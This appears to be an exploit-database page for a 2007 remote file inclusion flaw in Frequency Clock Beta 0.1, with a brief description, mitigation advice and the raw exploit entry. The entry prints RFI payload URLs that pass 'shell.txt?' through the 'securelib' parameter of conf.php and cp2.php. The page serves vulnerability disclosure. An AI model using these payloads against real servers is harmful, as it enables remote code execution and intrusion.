header-logo
Suggest Exploit
vendor:
Frequency Clock
by:
ThE TiGeR
N/A
CVSS
HIGH
Remote file inclusion
CWE
Product Name: Frequency Clock
Affected Version From: Frequency Clock Beta 0.1
Affected Version To: Frequency Clock Beta 0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Frequency Clock Beta 0.1 Remote file include (securelib)

The vulnerability allows an attacker to include a remote file on the server, which can lead to remote code execution or unauthorized access to sensitive information.

Mitigation:

The vulnerability can be mitigated by properly validating and sanitizing user input before including it in a file path.
Source

Exploit-DB raw data:

#Frequency Clock Beta 0.1 Remote file include (securelib)

#Download script : http://kop.fact.co.uk/DIVE/cd/distribution/Frequency_Clock/frequencyclock.zip

#Thanks str0ke :D

#Exploit

#http://localhost/[PATH]/conf.php?securelib=shell.txt?

##http://localhost/[PATH]/cp2.php?securelib=shell.txt?

#Discovered by : ThE TiGeR

#Contact : Miro_Tiger[at]hotmail[dot]com

# milw0rm.com [2007-05-27]

Navigation

Suggest Exploit

Services By CQR